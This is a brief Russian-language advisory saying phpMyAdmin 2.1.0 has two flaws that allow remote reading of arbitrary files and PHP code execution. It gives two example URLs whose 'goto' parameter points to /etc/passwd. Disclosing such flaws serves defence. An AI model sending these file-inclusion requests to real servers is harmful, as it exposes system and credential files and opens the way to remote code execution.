PhpMyAdmin - полезный инструмент для управления базой данных MySQL, через WEB интерфейс. Две уязвимости позволяют удаленно прочитать любой файл на диске, а также выполнить произвольный код (через PHP). Пример:
1. http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No
2. http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
Уязвимость работает в версии 2.1.0.
